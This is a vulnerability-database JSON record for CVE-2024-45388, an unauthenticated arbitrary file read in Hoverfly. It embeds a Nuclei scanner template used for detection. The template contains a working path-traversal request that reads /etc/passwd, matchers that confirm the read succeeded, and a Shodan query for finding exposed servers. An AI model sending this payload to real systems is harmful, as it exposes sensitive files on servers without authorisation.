{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-45388/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-45388/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-45388/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-45388/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-45388/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-45388"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-45388"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-45388.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2024-45388\n\ninfo:\n  name: Hoverfly < 1.10.3 - Arbitrary File Read\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: high\n  description: |\n    Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n  impact: |\n    Unauthenticated attackers can read arbitrary files from the Hoverfly server including sensitive configuration data.\n  remediation: |\n    Update Hoverfly to version 1.10.3 or later.\n  reference:\n    - https://github.com/advisories/GHSA-6xx4-x46f-f897\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-45388\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2024-45388\n    cwe-id: CWE-20\n    epss-score: 0.55574\n    epss-percentile: 0.98992\n  metadata:\n    max-request: 1\n    verified: true\n    shodan-query: http.favicon.hash:1357234275\n  tags: cve,cve2024,hoverfly,lfi,intrusive,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        PUT /api/v2/simulation HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        {\"data\":{\"pairs\":[{\"request\":{},\"response\":{\"bodyFile\": \"../../../../../../../etc/passwd\",\"x\":\"aaa\"}} ]},\"meta\":{\"schemaVersion\":\"v5.3\"}}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n          - 'hoverflyVersion'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - application/json\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100a23263dfa7c0c1f366a0648a18f620ef52a8f6931957923f773ba997bf94a5a2022100f2b2de237407c26dd6fce07562d9ec1d87d40727d9dd22826dd44c7877652930:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-45388"
}